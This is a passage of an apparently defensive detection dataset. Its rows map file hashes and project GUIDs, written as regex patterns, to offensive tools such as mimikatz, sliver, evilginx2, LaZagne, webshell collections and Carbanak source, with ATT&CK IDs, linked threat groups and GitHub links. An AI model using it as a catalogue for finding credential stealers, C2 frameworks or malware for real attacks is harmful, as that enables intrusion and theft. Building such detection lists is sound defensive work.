- T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31557" "*97e7f134cfbb11e0e3ade71cdb5de36ea8cfdffe5272ea7293e35bd2b91f3449*",".{0,1000}97e7f134cfbb11e0e3ade71cdb5de36ea8cfdffe5272ea7293e35bd2b91f3449.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along 
with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31558" "*97f7f1ee8228a28173f07062e712dfaa25f64cfcf443a7f1d26c9502f6046b50*",".{0,1000}97f7f1ee8228a28173f07062e712dfaa25f64cfcf443a7f1d26c9502f6046b50.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","#filehash","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","31559" "*98063f3e117a093aee435c3b1130f770b9a98022165356ff1679a6f33a61e1e5*",".{0,1000}98063f3e117a093aee435c3b1130f770b9a98022165356ff1679a6f33a61e1e5.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","31561" "*980b1116ad7c83280e58fa50c2fc66c4d596a04b64be88b19faac781416aa9a3*",".{0,1000}980b1116ad7c83280e58fa50c2fc66c4d596a04b64be88b19faac781416aa9a3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31562" "*980EF05F-87D1-4A0A-932A-582FB1BC3AC3*",".{0,1000}980EF05F\-87D1\-4A0A\-932A\-582FB1BC3AC3.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an 
active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","#GUIDproject","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","31564" "*981d1e5d88087f716ebb0cf8b39ffe7d3e44c36bc1e34452c8eaf2eaa56c05f9*",".{0,1000}981d1e5d88087f716ebb0cf8b39ffe7d3e44c36bc1e34452c8eaf2eaa56c05f9.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","#filehash","N/A","8","1","N/A","N/A","N/A","N/A","31565" "*98259461df694aaf1b39e3964495efa332ebcae4e1c5dddcb4169fb0a16fca91*",".{0,1000}98259461df694aaf1b39e3964495efa332ebcae4e1c5dddcb4169fb0a16fca91.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31566" "*982e0bbb1c1ee2c49d3be4ad0a076a402d8c07a9712bbf2244c39d5550b37587*",".{0,1000}982e0bbb1c1ee2c49d3be4ad0a076a402d8c07a9712bbf2244c39d5550b37587.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31569" "*9839381c8f3e41010d167ca438c054628ea54b7c53231d444281fa217d30fc45*",".{0,1000}9839381c8f3e41010d167ca438c054628ea54b7c53231d444281fa217d30fc45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31572" "*983d8e01186ca136d8543a244c21ade3f938d5c51ac610a14c37230a9f123c61*",".{0,1000}983d8e01186ca136d8543a244c21ade3f938d5c51ac610a14c37230a9f123c61.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31574" "*9842380cb6f04a1ba1d6d161b14999037cd66f7bbde2bd55bf89835e20a5cdae*",".{0,1000}9842380cb6f04a1ba1d6d161b14999037cd66f7bbde2bd55bf89835e20a5cdae.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - 
BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31575" "*9842380cb6f04a1ba1d6d161b14999037cd66f7bbde2bd55bf89835e20a5cdae*",".{0,1000}9842380cb6f04a1ba1d6d161b14999037cd66f7bbde2bd55bf89835e20a5cdae.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31576" "*98449032055b0658d49bc712656d9ccddb13d46c87d623344fd1829601b3ec7f*",".{0,1000}98449032055b0658d49bc712656d9ccddb13d46c87d623344fd1829601b3ec7f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31577" "*98456f61bb55fd826a5def604590780b552a261249ee82cf1969008fc67b40bf*",".{0,1000}98456f61bb55fd826a5def604590780b552a261249ee82cf1969008fc67b40bf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31578" "*984f119adf8040c9c400f4fdb937bd99a7a26ce18db101b330472dd9ca4b52f3*",".{0,1000}984f119adf8040c9c400f4fdb937bd99a7a26ce18db101b330472dd9ca4b52f3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31580" "*985976339729a11396ed9c207afa49b16961aef42db3ee69066d2d2a5c69bfde*",".{0,1000}985976339729a11396ed9c207afa49b16961aef42db3ee69066d2d2a5c69bfde.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31582" "*98599d98012adc240e17c6b157e52bdf7b1831e45164d4b27862189c462392d4*",".{0,1000}98599d98012adc240e17c6b157e52bdf7b1831e45164d4b27862189c462392d4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31583" "*985ac7064c18852f34f9243d5d51703fca8e5540efe1d01a259640b5798c2724*",".{0,1000}985ac7064c18852f34f9243d5d51703fca8e5540efe1d01a259640b5798c2724.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31584" "*985f61fb06d7878172ab9e204eb42ddb76d299c69b7070c4abb26c3ab39873c8*",".{0,1000}985f61fb06d7878172ab9e204eb42ddb76d299c69b7070c4abb26c3ab39873c8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31585" 
"*9861d10bbed4f966d0173aa361530189107a31e37478464d8ef4bda189252214*",".{0,1000}9861d10bbed4f966d0173aa361530189107a31e37478464d8ef4bda189252214.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31586" "*9865ed1503bfac59d77f262ec4d443bc2eef2e850120ca601d406ff8d61c8bbb*",".{0,1000}9865ed1503bfac59d77f262ec4d443bc2eef2e850120ca601d406ff8d61c8bbb.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","31588" "*987001995ecb92cb1fa659097e4be63c46568c00e4f91ed0162d0ed973831c50*",".{0,1000}987001995ecb92cb1fa659097e4be63c46568c00e4f91ed0162d0ed973831c50.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","31589" "*9870daa238c3cab7fa949a1f8b80d3451c78eb07d18030ad061d8b91d612decc*",".{0,1000}9870daa238c3cab7fa949a1f8b80d3451c78eb07d18030ad061d8b91d612decc.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. 
(included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","#filehash","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","31590" "*9877b56ae67e7621ad2dddc906db9e35eb13fb7cac6cab92b1931d6bcfe9d3d2*",".{0,1000}9877b56ae67e7621ad2dddc906db9e35eb13fb7cac6cab92b1931d6bcfe9d3d2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31592" "*9877ed9aec8766036bb9dd702e41433916a6d6c886ff55eea07fce92bcbf6b29*",".{0,1000}9877ed9aec8766036bb9dd702e41433916a6d6c886ff55eea07fce92bcbf6b29.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","31593" "*987d8536a5a920ff49ab1d0948bc5d7c45a7610b2737e407971c361d7072485a*",".{0,1000}987d8536a5a920ff49ab1d0948bc5d7c45a7610b2737e407971c361d7072485a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31594" "*987d9b6f804800af119f8f286976ae67a3ce09e2b54170511afa8307fe40f70c*",".{0,1000}987d9b6f804800af119f8f286976ae67a3ce09e2b54170511afa8307fe40f70c.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and 
NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","31595" "*987ebc109f9bb594b780a59dbe5f5b5c3694f5ac21bb0bd044b4e06ccb64bdab*",".{0,1000}987ebc109f9bb594b780a59dbe5f5b5c3694f5ac21bb0bd044b4e06ccb64bdab.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","#filehash","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","31596" "*98900e81fda3f034d4b54e347f69f78be803fbc76df09fc75ba56329bb21c03c*",".{0,1000}98900e81fda3f034d4b54e347f69f78be803fbc76df09fc75ba56329bb21c03c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31600" "*989080753be26eaa2b93d3a01bd4296874162f06d126f78be96749fb95c66aef*",".{0,1000}989080753be26eaa2b93d3a01bd4296874162f06d126f78be96749fb95c66aef.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","31601" "*989A9793-63FC-4639-8A8D-E4BB9F60F137*",".{0,1000}989A9793\-63FC\-4639\-8A8D\-E4BB9F60F137.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","31604" "*989c13f0254e514c0ac261973a6d736917bf10af88b3ded86df954305b838640*",".{0,1000}989c13f0254e514c0ac261973a6d736917bf10af88b3ded86df954305b838640.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31605" "*989cb6a23ecba5fb7785a1e23b61b84c12ff45723eb98bb885905768e0a9550a*",".{0,1000}989cb6a23ecba5fb7785a1e23b61b84c12ff45723eb98bb885905768e0a9550a.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","#filehash","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","31606" "*989e7ae1b470f2f483683ff46c38dafc347b6a541d3054ccb8c1ab5e208876b8*",".{0,1000}989e7ae1b470f2f483683ff46c38dafc347b6a541d3054ccb8c1ab5e208876b8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31607" 
"*98a6c8b05256efdf08b252f191b7fefbc76486301fca678a442d2a9ef6393650*",".{0,1000}98a6c8b05256efdf08b252f191b7fefbc76486301fca678a442d2a9ef6393650.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","31608" "*98aa35c31f41c95a5516b0cbb52bf6d429f96919d665c6a45a89a5559550639c*",".{0,1000}98aa35c31f41c95a5516b0cbb52bf6d429f96919d665c6a45a89a5559550639c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31609" "*98aa8eec1bda59ea57693a6312bae2b76b2e71dd29cd0f85453c3d867ec69394*",".{0,1000}98aa8eec1bda59ea57693a6312bae2b76b2e71dd29cd0f85453c3d867ec69394.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","#filehash","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","31610" "*98ad711010195669ee57216b2b376e81fec7437ceab10ab369fee7598d931a1a*",".{0,1000}98ad711010195669ee57216b2b376e81fec7437ceab10ab369fee7598d931a1a.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open 
source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","31612" "*98b1b6fb910bda21e3e331382c73dd81f5bd9f36165b1719f446ea9e253f0f16*",".{0,1000}98b1b6fb910bda21e3e331382c73dd81f5bd9f36165b1719f446ea9e253f0f16.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. 
The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","0","#filehash","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","31613" "*98b4b0f773391657d762c06de6aa9710e7f56d64a0fd720d1a68e733a8173062*",".{0,1000}98b4b0f773391657d762c06de6aa9710e7f56d64a0fd720d1a68e733a8173062.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","31615" "*98c5018947477f613943240fb4c19347e2ca720850a078d959df5fd3be8ef4dd*",".{0,1000}98c5018947477f613943240fb4c19347e2ca720850a078d959df5fd3be8ef4dd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31618" "*98ca478259d56946281a780fe164c4415dd7dda9e4802b547b4622a8378b15b0*",".{0,1000}98ca478259d56946281a780fe164c4415dd7dda9e4802b547b4622a8378b15b0.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","31619" "*98d26f3cd9d1e221c76a2b274950d73085f8dd17a2eaceffda43cf5c5a45bdc2*",".{0,1000}98d26f3cd9d1e221c76a2b274950d73085f8dd17a2eaceffda43cf5c5a45bdc2.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","31620" "*98d590b2d7e7ee6c87e251a26f155e9c20765829e8ac291092d139aaa6fae676*",".{0,1000}98d590b2d7e7ee6c87e251a26f155e9c20765829e8ac291092d139aaa6fae676.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","31622" "*98e8bbdf74db34c8ebddf41e0f5574033df9d7c1390e37bcbe0466ce1705c6e4*",".{0,1000}98e8bbdf74db34c8ebddf41e0f5574033df9d7c1390e37bcbe0466ce1705c6e4.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","31623" "*98f2b951313b8535bf4a2b0310f59426168b8e2792513d7aed4fa6f16d9fe9a3*",".{0,1000}98f2b951313b8535bf4a2b0310f59426168b8e2792513d7aed4fa6f16d9fe9a3.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31624" "*98f65ce7ce360459e9b05b8082d13b27a37efaf63213f80a89b2e22a6a0c38ea*",".{0,1000}98f65ce7ce360459e9b05b8082d13b27a37efaf63213f80a89b2e22a6a0c38ea.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team 
